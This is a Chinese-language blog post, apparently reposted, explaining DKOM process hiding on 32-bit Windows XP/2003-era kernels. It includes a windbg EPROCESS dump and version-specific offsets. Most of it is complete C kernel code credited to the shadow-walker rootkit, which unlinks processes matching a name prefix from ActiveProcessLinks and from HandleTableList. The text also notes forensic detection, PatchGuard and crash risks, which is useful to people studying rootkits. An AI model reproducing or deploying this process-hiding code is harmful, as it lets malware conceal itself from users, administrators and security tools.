
修改ActiveProcessLinks链表隐藏进程


在Windows內核中有一個活動進程鏈表,其表頭為 PsActiveProcessHead。它是一個雙向鏈表,串起了系統中所有進程的EPROCESS結構:每個EPROCESS都包含一個名為ActiveProcessLinks的LIST_ENTRY結構,其FLINK和BLINK兩個指針分別指向鏈表中的下一個和上一個進程。當某些模塊需要獲得系統中運行的所有進程信息時,就會遍歷這個鏈表;若把某個進程的結點從這條鏈表上摘掉,該進程對這些模塊而言就被隱藏了。需要注意的是,這只是「單一視角」的隱藏:該進程仍然存在於 PspCidTable、會話進程鏈表(SessionProcessLinks,見下方 dump)等其他內核結構中,內存取證工具通過多視角交叉比對(例如直接掃描內存中的 EPROCESS 池塊)即可發現它;而在 64 位 Windows 上,內核補丁保護(PatchGuard)會把對這條鏈表的此類篡改當作關鍵結構損壞並觸發藍屏。
EPROCESS的結構可參考 http://www.nirsoft.net/kernel_struct/vista/EPROCESS.html(Vista 版佈局)。下面的 windbg 輸出中 ActiveProcessLinks 位於 0x088、ObjectTable 位於 0x0c4,與後文代碼中 32 位 Windows XP/2003 所用的偏移一致,和 Vista 的佈局並不相同:
0:000> dt _EPROCESS
?? +0x000 Pcb????????????? : _KPROCESS
?? +0x06c ProcessLock????? : _EX_PUSH_LOCK
?? +0x070 CreateTime?????? : _LARGE_INTEGER
?? +0x078 ExitTime???????? : _LARGE_INTEGER
?? +0x080 RundownProtect?? : _EX_RUNDOWN_REF
?? +0x084 UniqueProcessId? : Ptr32 Void
?? +0x088 ActiveProcessLinks : _LIST_ENTRY
?? +0x090 QuotaUsage?????? : [3] Uint4B
?? +0x09c QuotaPeak??????? : [3] Uint4B
?? +0x0a8 CommitCharge???? : Uint4B
?? +0x0ac PeakVirtualSize? : Uint4B
?? +0x0b0 VirtualSize????? : Uint4B
?? +0x0b4 SessionProcessLinks : _LIST_ENTRY
?? +0x0bc DebugPort??????? : Ptr32 Void
?? +0x0c0 ExceptionPort??? : Ptr32 Void
?? +0x0c4 ObjectTable????? : Ptr32 _HANDLE_TABLE
?? ......
也就是說,每次得到一個ActiveProcessLinks的地址,再減去它在EPROCESS結構中的偏移,就得到了該EPROCESS的地址,進而可以讀取EPROCESS的任何成員。不同操作系統版本中ActiveProcessLinks的偏移各不相同;偏移用錯不會被任何機制攔截,而是直接讀寫到錯誤的內核內存,通常表現為藍屏。
要想隱藏某個進程,將其從ActiveProcessLinks鏈表中摘掉並修改前後結點的指向即可;同時還要修改其句柄表所在的HandleTableList鏈表(否則進程仍可通過句柄表鏈表被枚舉出來),shadow-walker 中就對HandleTableList鏈表也做了同樣的處理。EPROCESS 中 ObjectTable(指向 _HANDLE_TABLE)的偏移,以及 _HANDLE_TABLE 中 HandleTableList 的偏移,在不同操作系統中也不同,可以通過 PsGetVersion 獲取系統主/次版本號後分別賦值,具體值可以在windbg中查看。注意:僅憑主/次版本號區分並不可靠——同一版本的不同 Service Pack 或內核 build 可能移動這些字段——更穩妥的做法是同時檢查 build 號,或從調試符號中解析偏移。
/*
 * Version-dependent EPROCESS / _HANDLE_TABLE offsets (32-bit kernels only:
 * every value below is an x86 offset).  This is a fragment of a larger
 * function whose signature is not shown; pd_flink, pd_tableoff and
 * pd_tablelist are output parameters filled in from the running kernel's
 * major/minor version.
 *
 *   *pd_flink     - offset of EPROCESS.ActiveProcessLinks
 *   *pd_tableoff  - offset of EPROCESS.ObjectTable (pointer to _HANDLE_TABLE)
 *   *pd_tablelist - offset of HandleTableList inside _HANDLE_TABLE
 *
 * NOTE(review): only the major/minor version is consulted; the build number
 * (PsGetVersion's third argument) is passed as NULL and ignored, so a service
 * pack that moves these fields is silently mis-handled - and a wrong offset
 * here corrupts an arbitrary kernel structure.  There is also no final else:
 * on any other version (e.g. major 6) the three outputs are left untouched
 * and the caller proceeds with whatever they already held.
 */
ULONG majorVersion;
ULONG minorVersion;
// Get the operating system version
PsGetVersion( &majorVersion, &minorVersion, NULL, NULL );
if (majorVersion == 4 && minorVersion == 0)
{
    //DbgPrint("Stop supporting NT 4.0");
    return STATUS_UNSUCCESSFUL;
}
else if (majorVersion == 5 && minorVersion == 0)
{
    //DbgPrint("Microsoft Windows 2000 ");
    *pd_flink = 160;            /* 0xa0 */
    *pd_tableoff = 0x128;
    *pd_tablelist = 0x54;
}
else if (majorVersion == 5 && minorVersion == 1)
{
    //DbgPrint("Microsoft Windows XP ");
    *pd_flink = 136;            /* 0x88 - matches the windbg dump above */
    *pd_tableoff = 0xc4;        /* matches ObjectTable at +0x0c4 in the dump */
    *pd_tablelist = 0x1c;
}
else if (majorVersion == 5 && minorVersion == 2)
{
    //DbgPrint("Microsoft Windows Server 2003 ");
    // NOTE(review): identical to the XP values and left with empty trailing
    // comments in the original - verify against a 2003 kernel in windbg.
    *pd_flink = 136;
    *pd_tableoff = 0xc4;//
    *pd_tablelist = 0x1c; //
}
這種直接篡改內核對象來隱藏進程的方法就是所謂的 DKOM(Direct Kernel Object Manipulation,直接內核對象操作)。具體原理見下圖:

圖中,正常的連接情況如黑線箭頭所示,若要摘除某個結點,修改該結點前后兩個結點的指針即可,修改示意如紅線所示!代碼都是shadow-walker中的,如下
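void UnHookHandleListEntry(PEPROCESS eproc, DWORD d_handleTable, DWORD d_handleList);

/*
 * Splice one EPROCESS out of ActiveProcessLinks and out of its handle table's
 * list, then point the orphaned node at itself so that later walks through the
 * hidden process's own LIST_ENTRY never dereference stale neighbours.
 *
 *   eproc         - address of the EPROCESS to unlink (32-bit: DWORD holds a pointer)
 *   d_flinkOffset - offset of EPROCESS.ActiveProcessLinks
 *   d_tableOffset - offset of EPROCESS.ObjectTable
 *   d_tableList   - offset of HandleTableList inside _HANDLE_TABLE
 */
static void UnlinkEprocess(DWORD eproc, DWORD d_flinkOffset, DWORD d_tableOffset, DWORD d_tableList)
{
    PLIST_ENTRY links = (PLIST_ENTRY)(eproc + d_flinkOffset);

    /* Neighbours skip over us: Blink->Flink = Flink, Flink->Blink = Blink.
     * Field access replaces the original "(DWORD *)Flink + 1" arithmetic,
     * which only landed on Blink because pointers are 4 bytes on x86. */
    links->Blink->Flink = links->Flink;
    links->Flink->Blink = links->Blink;

    UnHookHandleListEntry((PEPROCESS) eproc, d_tableOffset, d_tableList);

    /* Same value as the original &(links->Flink): the entry's own address. */
    links->Flink = links;
    links->Blink = links;
}

/*
 * Unlink every process whose EPROCESS image-name field starts with p_name
 * (case-insensitive, via _strnicmp) from the ActiveProcessLinks list and from
 * its handle table's HandleTableList.  Classic DKOM process hiding for 32-bit
 * kernels; DWORD is used as the pointer-sized integer throughout.
 *
 *   p_name        - NUL-terminated image-name prefix to hide.  NULL and ""
 *                   are rejected: an empty prefix makes _strnicmp(...,0)
 *                   return 0 for every process and would unlink the whole
 *                   list, the caller included.
 *   d_procName    - offset of the image-name field inside EPROCESS
 *                   (assumed to be a NUL-terminated char array - confirm
 *                   against the target build's EPROCESS layout)
 *   d_flinkOffset - offset of EPROCESS.ActiveProcessLinks
 *   d_tableOffset - offset of EPROCESS.ObjectTable
 *   d_tableList   - offset of HandleTableList inside _HANDLE_TABLE
 *
 * The walk starts at the current process and stops when it returns to it.
 * Fix over the original: if the current process itself matched the prefix it
 * was unlinked on the first iteration, so the walk could never return to it
 * and spun forever in the kernel.  The current process is now skipped during
 * the walk and, if it matches, unlinked only after the walk has completed.
 *
 * NOTE(review): the list is modified without holding the kernel's
 * process-list lock, so a concurrent process create/exit races this walk;
 * offsets are trusted as given, and a wrong one corrupts arbitrary kernel
 * memory.  On 64-bit Windows, Kernel Patch Protection treats this kind of
 * process-list tampering as critical structure corruption (bugcheck 0x109).
 */
void HideEPROCESSByPrefix(char *p_name, DWORD d_procName, DWORD d_flinkOffset, DWORD d_tableOffset, DWORD d_tableList)
{
    size_t      len;
    DWORD       self_eproc, curr_eproc, next_eproc;
    PLIST_ENTRY links;

    if (p_name == NULL || p_name[0] == '\0')
        return;
    len = strlen(p_name);

    self_eproc = (DWORD) PsGetCurrentProcess();
    curr_eproc = self_eproc;

    do
    {
        links = (PLIST_ENTRY)(curr_eproc + d_flinkOffset);

        /* Read the successor before unlinking: an unlinked node's pointers are
         * made self-referential by UnlinkEprocess. */
        next_eproc = (DWORD) links->Flink - d_flinkOffset;

        /* The anchor of the walk is deliberately left in place here. */
        if (curr_eproc != self_eproc &&
            _strnicmp(p_name, (const char *)(curr_eproc + d_procName), len) == 0)
        {
            UnlinkEprocess(curr_eproc, d_flinkOffset, d_tableOffset, d_tableList);
        }

        curr_eproc = next_eproc;
    } while (curr_eproc != self_eproc);

    /* Handle the anchor last, once the loop condition above no longer needs it. */
    if (_strnicmp(p_name, (const char *)(self_eproc + d_procName), len) == 0)
        UnlinkEprocess(self_eproc, d_flinkOffset, d_tableOffset, d_tableList);
}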


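/*
 * Splice this process's _HANDLE_TABLE out of the kernel's HandleTableList.
 * The handle-table list is a second "view" of live processes, so a process
 * removed only from ActiveProcessLinks would still be enumerable through it.
 *
 *   eproc         - the EPROCESS being hidden
 *   d_handleTable - offset of EPROCESS.ObjectTable (pointer to _HANDLE_TABLE)
 *   d_handleList  - offset of HandleTableList inside _HANDLE_TABLE
 *
 * Fix over the original: the ObjectTable pointer is checked for NULL before
 * use.  ObjectTable can be NULL (e.g. for a process that is already tearing
 * down - confirm for the target build); the original then used
 * 0 + d_handleList as the LIST_ENTRY address and wrote through its
 * Flink/Blink, a guaranteed bugcheck.
 *
 * 32-bit kernels only: DWORD is used as the pointer-sized integer.
 */
void UnHookHandleListEntry(PEPROCESS eproc, DWORD d_handleTable, DWORD d_handleList)
{
    DWORD       handle_table = *(PDWORD)((DWORD) eproc + d_handleTable);
    PLIST_ENTRY entry;

    if (handle_table == 0)
        return;                         /* no handle table - nothing to unlink */

    entry = (PLIST_ENTRY)(handle_table + d_handleList);

    /* Neighbours skip over this entry.  Field access replaces the original
     * "(DWORD *)Flink + 1" trick, which relied on 4-byte pointers to reach Blink. */
    entry->Blink->Flink = entry->Flink;
    entry->Flink->Blink = entry->Blink;

    /* Point the orphaned entry at itself (same value as the original
     * &(entry->Flink), i.e. the entry's own address) so later walks through
     * it do not follow stale neighbours. */
    entry->Flink = entry;
    entry->Blink = entry;
}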

轉載于:https://www.cnblogs.com/vcerror/p/4289090.html
